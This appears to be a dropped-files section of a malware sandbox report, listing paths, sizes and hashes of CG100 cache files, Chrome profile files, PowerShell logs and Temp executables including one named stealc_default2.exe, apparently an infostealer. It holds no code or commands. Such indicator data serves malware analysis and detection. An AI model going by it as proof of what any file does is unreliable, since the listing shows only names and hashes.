5f86000ec4968a51d6e62e819bda5b3ce2520d6cb43de2c7956f4d6dac8a60f3f4bcb8bce36d68b8e5807472cf22e36b882078f8a2bef946e4acf709848dd33d

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\19ABB397CF0DBF4B422A5DFC86DAAA1FFE753310.temp

Filesize
148KB

MD5
fbabd93a054a5640d98f9a0e811381e8

SHA1
19abb397cf0dbf4b422a5dfc86daaa1ffe753310

SHA256
b4d8461e5d2c03e1a6eb58ad696d26aa0a7c8709eb4ca4aec632f3e04607ab04

SHA512
b773d05e1b31109899370bfe211558c2e1aee67edae9eb44a10862b9cb67abb8213f13dfe349c311bf87b807469adf273a173515fcfd041d2864ae3f478612e6

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\1ACBA04C7AB704114F004A2FFDC65C231D88DB37.temp

Filesize
18KB

MD5
0a140e3610d15ea1b408266dd54331f2

SHA1
1acba04c7ab704114f004a2ffdc65c231d88db37

SHA256
b8ae54d4cc2848e26beb5c03901ab5097d273d2144b0a0cca24517e4bbbbf78a

SHA512
f64cdbf0f8b3818f01b71ba6d0c437abc9151571726c070bc951196d9532d6dafc0e9ac0e21865635ffb589f7530c413c87e5f9cdf135712288fed84e782e932

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\1B83A8C4A33CA87E9C15450C6671E935EA863B13.temp

Filesize
828KB

MD5
cd96c6562bdbb6de700e3e4fd9807949

SHA1
1b83a8c4a33ca87e9c15450c6671e935ea863b13

SHA256
c0f4933c577d8a326a5995e6a4e555444b2cd61305f66373d0fc206e3aaa10ea

SHA512
65ed6bc9d61a43b4eceab08f9215bb92cf8d6bd0d3a5535ee63aec5ffd7cdcc218cd3f9f95b29bf5244fbdcf603954b2dfc7459522403470a29f7287b9028b76

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\1BDFA14A0883AC96FFED09237C503C8ACCBBC2BD.temp

Filesize
19KB

MD5
cb5dbaa334d0784bb225761474fb4e59

SHA1
1bdfa14a0883ac96ffed09237c503c8accbbc2bd

SHA256
dace42c257053f70a4a6e832ad5586ec01ed874a7762b43f20e018b4907b8dae

SHA512
d5b030a366dea90a971ae2da22845250beabe4bf2f352eaa3870b5fe97815f4f38b0a812aedc7e173fada08d11336115c3bdcf14e4bb1224324bd8bd129f9a6b

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\1E3E06BB40EE195015E3917492B1F89AA0D5F6F4.temp

Filesize
19KB

MD5
2b752370dd03d5b12d4ec2d66a6dc15b

SHA1
1e3e06bb40ee195015e3917492b1f89aa0d5f6f4

SHA256
896bb4e7a7dfb92d040d44c109264a1a57666983bcc34fbce9858b201d26083f

SHA512
c55fc423b7670f2494b264e3270e9ff6d2e7acb587ff25e9d37267bc4ca72c005e2767bb67a3c4a0b755ddeb9e9bbd41a84dfe4e87833598f99f451b97f71f5e

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\2380A9E72AF5DCA2B0311562D3B447D8DC65B17E.temp

Filesize
19KB

MD5
d85d248a5fb70aae8f7b90e7b34f208a

SHA1
2380a9e72af5dca2b0311562d3b447d8dc65b17e

SHA256
e4a91fe4bdc8cb032e9149ee36b4c3b2ad42351652cfae6093d1415d5d6e7c33

SHA512
b37314fb7094234f22bb838903dd1fc093b6b13342176ae175545e85cf9b7d63927c71c4bd671837271d62054a4bf9607e2026b02f5789e2cb916e1ddbd2e888

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\2A706504AB956CFABA611E9551111B7B004A0ED6.temp

Filesize
10.1MB

MD5
41ba5678a81003f4f12cfda4c800f61f

SHA1
2a706504ab956cfaba611e9551111b7b004a0ed6

SHA256
5b1163be18794458dbb11797415111ab61d9cd946395ac417aa9a5b38ab75fd8

SHA512
ef9f906774ef70c758d300f0968e8be8b0503c572bd189f1db3fc88c9ccf574f51a29d5b6bc3a7d80864e2c928623c5f1966226f9bbd56f7e362f39fbd0a8b03

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\3E1C26ABA565C2BAC093EB70F38B682C10E6DD24.temp

Filesize
22KB

MD5
d3b3e9d889b4a107be11d0c65469ceab

SHA1
3e1c26aba565c2bac093eb70f38b682c10e6dd24

SHA256
583bb3720c39903ea78a38f2a2021c6d1720db9df8dfb7d5742987ab567bdac3

SHA512
af11e1162a6069dc5cbea5ec7c7a0752c93c25acc4761328f2983387e4e1611462f131ffbc2277dc9423512157e031d4012f8be50bbb9805046cfe3174f9b627

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\3EB0E2FE0FB8680E4E146BB02DE499E11DA81AF8.temp

Filesize
72KB

MD5
7769e655fa3f889fa3898d1539e1719d

SHA1
3eb0e2fe0fb8680e4e146bb02de499e11da81af8

SHA256
cee506be6201ddadfefa7334a20ff2701974b37fabd9b972e59e41d910131dbc

SHA512
3a303276cf7132964a57c056076fdda17db586fd4c8203e8740bf7559a270e68742543d595a3b1aaaf4757f2b0cb38522e4279173efe906d8d1afbc30c720113

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\3FFBC4D7D7C4BD276A66ECADE563894451F5C9A6.temp

Filesize
4.2MB

MD5
e2c037cd8212ba25a14ca203347e2ca1

SHA1
3ffbc4d7d7c4bd276a66ecade563894451f5c9a6

SHA256
18c10aea5007d98ace3d84052051c180074d8ff4f0d8d9b4edb4cc82c1e30fd1

SHA512
26d807458f81cb17c557a9d586195cef849b75b6b019ee7476cda85b96db6627870e7468b9fb2f8a1f619dd3959e85dde406bbbbf2477002535f2f4730cb09a0

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\50BCB51AE7A02F84E6355AD962D916EE5214418B.temp

Filesize
19KB

MD5
a3edbf737b4afc093747ae0af7ba8dec

SHA1
50bcb51ae7a02f84e6355ad962d916ee5214418b

SHA256
e3a245cc2092b4833a7e807c40939ed58f788c15ce23b60b980aa29fdd2569a1

SHA512
24ff9cb74598c90904a310e6e7579dfc059fd45d9bf888ca7edd1c135c112faa1e7c0f3814423cbe2366a6e7f50d8e5b6d8682976b6d04d15ede6e6b291dddc8

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\56643F7883CA398DC5A8EC95489916C392F1C90E.temp

Filesize
24KB

MD5
374bb68be767eb63f2255fc174decf9a

SHA1
56643f7883ca398dc5a8ec95489916c392f1c90e

SHA256
74484b81796f7d2c04f353c1915cebe09a324beecf0234c2f35270236aebd152

SHA512
1d34c0ea86f1430e2eb96ad6996f051804142c21a4661cffbfcab19bff38e2cae787b447945fccea3cc6b053584a2f330c9c10011bba642cb5727dbc0de71ba5

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\5F3BA1E4E34BD2BDC769F7E2567C3B6BE329D66C.temp

Filesize
26KB

MD5
14b9c0761b5ef1a35d354ec97cb1faf8

SHA1
5f3ba1e4e34bd2bdc769f7e2567c3b6be329d66c

SHA256
a6f2d6874e034eabbacc9a157996d66e00bc7920bbf943ee80429a049620f6e9

SHA512
0406294b21609ce0e74cec53a037fe1fd42376143f492efacea6ef432fe277c69c3b32b666869aded1fad60debf32ccaaf4b7942eed09e00576bfcfb4eb0d03d

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\612829AAB093EEC25DC2D22C52E8D6ECFC0B2BF9.temp

Filesize
18KB

MD5
5bcb16fecf92cd6cdbc002e3ab04b060

SHA1
612829aab093eec25dc2d22c52e8d6ecfc0b2bf9

SHA256
b956a77b3f942ba7d553aa25a64e380c0335bfece7a6e67709e3d452d5d5b9a4

SHA512
f33419c83c8be195aff4e3b469c99de1c8ecb67290dbe976693819ac55d9465ee780b760a4761431c133af4876f3a5eafe076b3eb382a7b0ec7e341fd73043df

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\62AB8977B1956552EB6E53EB6DB0796B1B35B56B.temp

Filesize
20KB

MD5
79146584883f7c7300e0cff2d2a4afbc

SHA1
62ab8977b1956552eb6e53eb6db0796b1b35b56b

SHA256
f092ce303ca1155d114eae502b6d3880ef54be4ef69b438e6f242bc508b6180c

SHA512
e18fe31648fd87cc811889652271b589d124710631c836333ae838e7367df32170f81dda023b9b21210362e3fbcc29f1df02650d2d89bd43c6b619112f8ce098

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\674DDA8F84E07888E074B8F8806F074DD04C695C.temp

Filesize
29KB

MD5
c4573c621bc52523be3cbc8b52221803

SHA1
674dda8f84e07888e074b8f8806f074dd04c695c

SHA256
bbbd11bdc4fdb5f69ea561e1b278e9a883d2d7bbbbe08acee6658f48cbc2ff39

SHA512
27b96081a09cc2d0818eda4af1c538523753d92ee50c050c9dd945b9c421bfd27468d202d5ef65c505588390fba4d80ef608dba971183b48d15b92bb50863b92

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\73973252C0E0AF5D7C799C451DE42AAC11556A3E.temp

Filesize
23KB

MD5
ad5f367c065966b983f03289883127c2

SHA1
73973252c0e0af5d7c799c451de42aac11556a3e

SHA256
08f33efa415255d25fd12aea6860b695de0dc95e89868b5ef413268d2a77fdc1

SHA512
4e73649123b3a28e45e8dea32d1faed7e8528e59dd420e4ae3ddcb684e35d6171857db12d3f41b382e5331da533f788115bcba553e278ba75b01d53ff04833da

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\772AB6D2EC9372240F52203202CBED926C79B383.temp

Filesize
19KB

MD5
e713d700f89509a1e065c1fa06eeb2ac

SHA1
772ab6d2ec9372240f52203202cbed926c79b383

SHA256
2ac1a88bb448bbd6465ac4f7e0dec30bb1ad290504914515b97a0fe9c80beeca

SHA512
e3d66a6939c3ba5ebff28c0730d3a35363d86fb2e7b10cb6fbf282a4d2266aff951d8e578310f01c1cdcbaa730a2e93996d7e9f1facdfe8b25a39c64e191bcbd

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\79114B4EAC30E643D7CE7E48E811A0886969CAEA.temp

Filesize
20KB

MD5
9a1461e822a7828985031bc91d3a1e82

SHA1
79114b4eac30e643d7ce7e48e811a0886969caea

SHA256
5b43cc851e3b41258e9bb4ba364c74f5058fce9929c17af7c362c3bf0ccb60aa

SHA512
8b500a74c31d8037a2434e90d5a5a9de1bbf0cf0694c3c1325703861adf89da0bb9cf9d7c690f5c173f975c9e7f3d9f746c204b81d615c552b2d0a8feef6c189

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\88A145876586977C5F43CD05DC4A48B8EA35FED1.temp

Filesize
4.4MB

MD5
3d54cba09535808ed300fad872ceed4d

SHA1
88a145876586977c5f43cd05dc4a48b8ea35fed1

SHA256
1f60438f6b590dcd8587eeb19ae95086a94c20ae3520085d775974d660e00312

SHA512
6d7d2014d8307e489dd58e0d9e179d1601d938fcb7bb90181d0ef3484e71fe0a450365d0ebddbcd3648638ba950ff44359c6dcf604fbd97959e5650fba45104a

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\A39B43B3AF06EBEC49B1C93F8AA3B070369330D5.temp

Filesize
18KB

MD5
e670b5cc9dc3c4e74dd7033f83e1080b

SHA1
a39b43b3af06ebec49b1c93f8aa3b070369330d5

SHA256
b06ed70aea63630a0e2e09e3f6c1750adad3674426a30ce00d4751786c744250

SHA512
05305c5985928069337c4a125fac94d043e9566d24f8d0a52e8f8d7c15b94a5df44bfb37d5159da0910dda836311dd62a5d1115d6c708f6aa206a37989fba518

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\A9C199F555094629126C09EF24859B5FE742124A.temp

Filesize
19KB

MD5
6db8767a1a267e991de038abdbccff56

SHA1
a9c199f555094629126c09ef24859b5fe742124a

SHA256
1e98a204d73a01a0a86eaf06b4721fc9ba7524d63d1dba84a1606f9293e9f937

SHA512
71cba918a1cfe8da8f54cce1dd020ff49a5ef17ad99a672c74aeff7b8a21f151202b7c50a4cb580907ca307b27631358a5a9e79f8f32749fc1c54311a08a8c12

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\AC6B33F0431D31EAE1AAF96D1EA2C813F4B784A2.temp

Filesize
19KB

MD5
5b6d657abda428c1ae59777eb06feeda

SHA1
ac6b33f0431d31eae1aaf96d1ea2c813f4b784a2

SHA256
8b8e184deab14db38b4eea14967d4eeb247266161b595ea4c2301a74fe395da0

SHA512
774da3a7bf10fc472cc59ba3a2c74d7eedaf0de58dbf8e78a4fc4ccd7a7f289a3305003106aa1a54430c609eb6d71e6e3d645f975f0e642290084c863fe5a22a

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\B5A497DAD43C0F0578E7F6CD7F1BB4790BDBE63A.temp

Filesize
21KB

MD5
f43099dbada788e169b20b9ad91b0bfc

SHA1
b5a497dad43c0f0578e7f6cd7f1bb4790bdbe63a

SHA256
3b831368c74bb41ede1565bd052f027e2ac11fa2cfb0bb7e44497596614e0a50

SHA512
ec8b21d8f1c8c238764205077d3d738fe8578ead21adec5df73b374bbe8751bf72c1b4839ce16031b6667c92a70f2c29d345b574effcfe063efc673a4934a986

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\BCE86BF8406299E9A0696683F4C94ED191FC2DA5.temp

Filesize
20KB

MD5
431ef0218806e1f27a27c0a06596c04f

SHA1
bce86bf8406299e9a0696683f4c94ed191fc2da5

SHA256
e0efecffd9c9e2b375483041d7cec064b8086c21b6ad6da7b6c0a495d702e68e

SHA512
2b97ffbed8a60ffd49a8fa15e0851bf36ffb513993833e158e751c2822276ec42d815d2af5ecd6a34dd265d901c11ea26bc7cd9010aa76acd8ff76c5d3dda732

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\C00A8177E31F7412FB9068455A54F7EE0FD14ABB.temp

Filesize
24KB

MD5
cc50bdb3b1168f9e2f22b5c9f7e518e5

SHA1
c00a8177e31f7412fb9068455a54f7ee0fd14abb

SHA256
6eb0313e5283768fb2b68835f160fdbf44aa396407b57dd59cc036471ec68a31

SHA512
24f4a4aebec5b7f07e29fe81fba0d0cb451b5c5827028f6f084d41e230aa014d9d7c7fb9ec9633f2f79f2114b0d245d7e09a556b0f57e296016cf973908e48e4

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\C0D94BBFAF3A4F7837CA882B8DCCB3E4723E7DD1.temp

Filesize
19KB

MD5
a34e0fbca1e2de81651a9e75785855f3

SHA1
c0d94bbfaf3a4f7837ca882b8dccb3e4723e7dd1

SHA256
4fb1fb026ee4bba128eecbc5ae38c599d269e8235f8f6800b064b164856bcd69

SHA512
21e7d2d58b0557f48046c293c3069dd17e373f733d27613a8cdfacb364e4f8653c2c2d49f289ac42dbc8fce98bedab0655f57715b8c118498b66a6f731b51145

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\C4AAA86A31706DBF817A2BB621829183AA320F24.temp

Filesize
19KB

MD5
c6a0cb44cf430d9941f077cae4241a19

SHA1
c4aaa86a31706dbf817a2bb621829183aa320f24

SHA256
4196875beb7d567e24ce0562973db10fb7217fe567094e4426f59feba9f6fb59

SHA512
d1894a556d8652b064187b6308dbdffc6c57bf865d6b10855e8f7476b1c00f947964ff6794165ba45a5168d3b07b9124ef187e6df396899e2d0c06e36810b26d

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\C759DE99FE96FAA0542267CC2E7C6FE42251466A.temp

Filesize
19KB

MD5
316b785b14a36ae34fbe8dfbe0c43944

SHA1
c759de99fe96faa0542267cc2e7c6fe42251466a

SHA256
622d879d3f03cf36faebff42195674f540c30c36ad496c3b77f6c89c651d4448

SHA512
5af90f564adcb6121cfe67f248ca194af4fdddf5cfe5ec12a0742aee35a60e66f92daf7f266fad6930bf4d59a4bcc91bbd50bba0fd9b5c86ddbfab9557b06ce3

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\C8A6AB6A9F687D76348C8F2542FDB9BAEF4234CD.temp

Filesize
18KB

MD5
907384847a4e3002c9c9d621cabf2508

SHA1
c8a6ab6a9f687d76348c8f2542fdb9baef4234cd

SHA256
f144d246f27eee4ec942b6ccfae54c261b2d60e311d7f6c145a0e49caf402fc6

SHA512
aa9790d67e4551f23e9f3303cf855a065823a25dd23cdc3308d656b2980b9c717bd1131fe27fff5cf1759ea8231dbd69ab18912b080eb11c6b0c5c870433f7af

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\D05D34526ED52F4CC6711F833CD9D9A59BE74F51.temp

Filesize
21KB

MD5
1febaf84a28a62e697eda85e02e48a56

SHA1
d05d34526ed52f4cc6711f833cd9d9a59be74f51

SHA256
b681b2af239f44cb0ba6adb8e5c27a6fab904ba830dfc8f29ac24f525e2780b7

SHA512
83ac96a74989405e38365cf90fe97a68c0cfbbb027faeba1b8a01f5ed7435fd23acc7b822812a16fac50e9ba1f64cc47f85a09cc5d2a4d4bfb2edd261160beb3

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\D0A04074B4076379CD1BE3C489F056DD17942EC5.temp

Filesize
18KB

MD5
f7119a732d816be4a7f11dcd293008f7

SHA1
d0a04074b4076379cd1be3c489f056dd17942ec5

SHA256
628815d6eba2bae4b9e4750bce8d8878c8f8d3ec4d10c7cf10bdf1a6c26fb8eb

SHA512
045077e9d562068c61a87dad8fdb98244562d2f60ba82ca93e86733b997f548b9441666e5810a239696fc6581a8b67e1a4f366a59bf67b8dc03b1555c53784f9

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\D11D0926086E12485EB232724AEC31BDF50C40CC.temp

Filesize
18KB

MD5
27d8e19487a6a6622745af9330062bca

SHA1
d11d0926086e12485eb232724aec31bdf50c40cc

SHA256
3321f78798979aa0d89f25b94e0e419ad9db46bad1debd3ab891b5bddcc09cdf

SHA512
24ff2d0dd6bfa8c635a367844cffb5c9facfdc695009914011201ec35b52d6e383e258dac4bf330e455bdbc2dccd2ab2d5a54ccec7da487361329bc19b8aeb53

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\D3D078CD607072A66B644074FAA122D5FEAE5CCB.temp

Filesize
18KB

MD5
63f2c054b991f67f6b8344971d4968f7

SHA1
d3d078cd607072a66b644074faa122d5feae5ccb

SHA256
b41b84e929a014dcdcb47e0070f95ac96202d52cc8baeac487115d9068910226

SHA512
c4e8778479088408e0e41bbc4e8d2f33a5b52f64e269366348cd5b2d4ca5bda63f2c00692e992dd86abc053ef8848853566d3c4e478165fcdeda96d4b2ad32e8

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\D54DEDE54A66B846D883792CA766676BBF4EDA8B.temp

Filesize
98KB

MD5
d4e9754cf7d1d07d990d621a8111b29d

SHA1
d54dede54a66b846d883792ca766676bbf4eda8b

SHA256
362852766f050b6bb62d06479f06b5aa37e7a4c91a6f9bdd689ed41f873d423e

SHA512
06ef87fddc791c4b386118f58566c40fcc1cdd6124bb74f7af82543a7e944c83352853944a761a2a7406a9448860a4c8f06a827f4e6c81a1e27e8a01ba5e4abf

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\DC9ADD730406E6B925780F45068AE2AB543E4B58.temp

Filesize
18KB

MD5
b76387fedc728088768f18af998497d6

SHA1
dc9add730406e6b925780f45068ae2ab543e4b58

SHA256
7faf034842c02414d3a0162350600f82f30a9e89e9d0b2c9c39368eabb1529c9

SHA512
e39e47256054b4f655827c9aa96316927fc3fdd39fc9b0fb1125941fd0fb4558dbef6c183ff0e98e7d53b4fcd0fc1ac3c017327d3f25a4a88196609bf271b3ed

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\DFBF7DEF0FD31A10F8E0C7B45271015ACB7A320B.temp

Filesize
152KB

MD5
0c1fe84efca643ee24480d97ea5d01f7

SHA1
dfbf7def0fd31a10f8e0c7b45271015acb7a320b

SHA256
064a15cb6fc2ae1459724f5f90eba807b3043a7c9aa0e7bc9edc14aea625082d

SHA512
fede1636007a89b01b7260ec75eacee55725d31ba339ae288243de4046ff7998e91473664c5f62ca96ec3755c40103ccad8072417e45ea2e68e5283a9c2da891

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\E517E4CBDF4CFDA7A650E12EC0E9FC6BDE80B1D8.temp

Filesize
19KB

MD5
33143360089e149497dd9851102786bf

SHA1
e517e4cbdf4cfda7a650e12ec0e9fc6bde80b1d8

SHA256
9946fa22f09b551892ee91705ff7dead093da7c024291500c0607f2c27b39258

SHA512
9390028172693a38604dbea1c96e834f53604f4ad7324dcb7427575d0c1efc732c404bc17cab750149891e49f096f8f2f063d7e90e788a173f8944f887e93f4d

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\E68DB81AF1C6C57E4C1B07271B2D2C0EA4BB337F.temp

Filesize
18KB

MD5
99fb9f6da5684dada23a68b4de43fb08

SHA1
e68db81af1c6c57e4c1b07271b2d2c0ea4bb337f

SHA256
15ae24eb93397dc23a1e181cf9833431abe4db859055d51ff1e65cb9a43f3c63

SHA512
704aaae4fd0cbfd353594e81814cf565a813aeb5cd623d5d89a17cd324474df8294232e4535c3d4a1070f77f56c9234d1fd9cec38118e274df715abbc049d589

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\ECBFA7B25EF21AB9F0A603D837A2EC85AE2CD205.temp

Filesize
19KB

MD5
4ce2009b865a299d29639f9cfd0e4073

SHA1
ecbfa7b25ef21ab9f0a603d837a2ec85ae2cd205

SHA256
d799fad01dc6a5b891da0910ee8db64be4caa13b589f42957730798ff4f25829

SHA512
4d9a3d1783801ba679cd3f2781ad1c595d40fd8c615877de3cbb430af2f90c87224bc87a30cf1fa0c9bbed9326049d410052358f64adfd633cce0355a365b299

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\FE9B0D3CF05A8E39366074574B8C067A094F6FFF.temp

Filesize
18KB

MD5
b16edd687d38af6921d0f3872e7c5915

SHA1
fe9b0d3cf05a8e39366074574b8c067a094f6fff

SHA256
6da76ff6d4d97c6db5897ff9fc5fc30d4f2fd9d917a39792c4a7231816f8c08e

SHA512
daf7c18359cc48b0f348b58ff68636c982ee9c77ffc81339e776c2f7d3ee7f48a52b1182b61e8198c8867deed0257336f0127242c647c164ee5c0ec9c22718ac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
4752be6a106dfa2efbfe7a26e6e867d2

SHA1
d84de62a01f150f4134ed15e41cdfbdac78f4e7b

SHA256
ceddbcb3819694bf83be1f96160f98b0e41ce2272db805917f7d69424ba1596d

SHA512
f9a18d095aff71d2b6388e35d0dafb16a9a417e52ece0df45ed8045d2c8c2e6ec4b316660e9763ff52b3999477564fcbff4749b11ad4de33f9810fe5604d8c8f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
88f823671f9699676f14316a7a8c321b

SHA1
9cf667eea53ecbe959cc417ad30c86667d284eec

SHA256
d484c1d813fe54a543227388cae545e3900b6ad6be13e69cf354b38b232eef85

SHA512
ea8ae18b5eb59bee07c8a93331a2ff366932915c3494ff72bbecd913cf02d24600860d34afa8a07ceef44c782cb56d828e54c985fcd2b395657e08203b8323ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
9bd8dcdb193af4a64ba55868aabc8e87

SHA1
52f42b6984c97b26b216640dd0314d993e2db9a6

SHA256
32e68d96d13761063df9ebd823901dc04857adfd5dc60b328fc7283ba1370877

SHA512
1d553ab6274e0eb59719429507e174b1626762bbc5784ee0514b3af6ea9bcbb7fa87168ca14006c939fb3198ecde59ae4a15794876f18e21a3566c79a2aa6eba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
b2aebcea959e12e2b662c45f772aa2ff

SHA1
f80da5b41af98facf2dbc20143bcefbd40f5a17d

SHA256
2663a2e2d60325826d04f38250c3d537a1a099100f6ff95266ec346ee37d24e3

SHA512
bec8b30a91854b8500a7a503f4b5d0de0fd1a2dc6dca548f2a55ae7978e1a6740e2d947b4afdb54a0e359397d8480b634ae9e96c4521bbdeba709826cf84c312

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
ed731fae8f2cf4e4ea992112e8a1badc

SHA1
d9b75d7c3a0291797e2853938b22005cba9b56e8

SHA256
c41c6d43f5a81fa64689b0c728bbe15ed68a3372d7b03382a6539ec67b8225de

SHA512
c53189e3150bf2263d8f957f81e6a4943880a3cce8d53652ca40ce673eb5d20f9f26a41990a95ff2a990515a3a4976b66b3ff3e14677d38d0e1d53ee52efd421

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
234KB

MD5
a9f83d16e0f0043884e6699f945a40b4

SHA1
85f7fb7689015205881d7c26e1a7149c14533344

SHA256
3765ca2da54dfbe1eef266f51c1ce56ecb6ff08497946beb80840a91d98df892

SHA512
bfc895204cbe5e160086aa7572ece59216cc47a9b223a2de73b008a4cd77823f310ea725540dc99601a1c4a3ab850f9b9e4ec6ce71027e19f1edbeabcb198c13

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
43f4bec966ab901ac034fc136a642fa5

SHA1
8e7227cefec8b05c9a79b2751d1261187b9c0422

SHA256
09ea65cf68920d08638db30c86eb3c90254b9b2d9f73246bc0176c86ce687ae4

SHA512
a65a2fe6acf4cb0dae8361af3e42e35c6bfaa93859e744a7779630d785a56bb030161c92a74b88a223769fdb912911146a762cf6a8afe33642e2695ea08ceec0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

Filesize
307KB

MD5
68a99cf42959dc6406af26e91d39f523

SHA1
f11db933a83400136dc992820f485e0b73f1b933

SHA256
c200ddb7b54f8fa4e3acb6671f5fa0a13d54bd41b978d13e336f0497f46244f3

SHA512
7342073378d188912b3e7c6be498055ddf48f04c8def8e87c630c69294bcfd0802280babe8f86b88eaed40e983bcf054e527f457bb941c584b6ea54ad0f0aa75

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe

Filesize
572KB

MD5
34a152eb5d1d3e63dafef23579042933

SHA1
9e1c23718d5b30c13d0cec51ba3484ddc32a3184

SHA256
42365467efe5746a0b0076a3e609219a9cffe827d5a95f4e10221f081a3bf8fa

SHA512
270298ca39c3ff0ab4c576374a5c091135efad3c1cb9930888a74ef7d421f43039c2545eadecb037fcff2b8ee4e22cd4d809b19e7958b44ba1c72100135a46fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\1002824001\06981094fb.exe

Filesize
2.8MB

MD5
6a3268db51b26c41418351e516bc33a6

SHA1
57a12903fff8cd7ea5aa3a2d2308c910ac455428

SHA256
eaebfc5e60378bbc47a603ca1310440c290a396cb2446de36ff6e7afb624ee0c

SHA512
43f257dbb7e444355e29a8023e8c8838c9e0ca7538a86c25ac41db1e0308bf73c3adda1b0fe5d0bcf536387b9ce5f8fed216f5f7d92c80bcc12e7bffde979b33

Download Submit
C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe

Filesize
429KB

MD5
c07e06e76de584bcddd59073a4161dbb

SHA1
08954ac6f6cf51fd5d9d034060a9ae25a8448971

SHA256
cf67a50598ee170e0d8596f4e22f79cf70e1283b013c3e33e36094e1905ba8d9

SHA512
e92c9fcd0448591738daedb19e8225ff05da588b48d1f15479ec8af62acd3ea52b5d4ba3e3b0675c2aa1705185f5523dcafdf14137c6e2984588069a2e05309f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe

Filesize
3.9MB

MD5
b3834900eea7e3c2bae3ab65bb78664a

SHA1
cf5665241bc0ea70d7856ea75b812619cb31fb94

SHA256
cc35b0641c3c85446892311031369a42990c019c7b143b875be5c683e83ff3ce

SHA512
ae36ab053e692434b9307a21dcebe6499b60a3d0bca8549d7264b4756565cb44e190aa9396aea087609adaeb1443f098da1787fd8ffe2458c4fa1c5faea15909

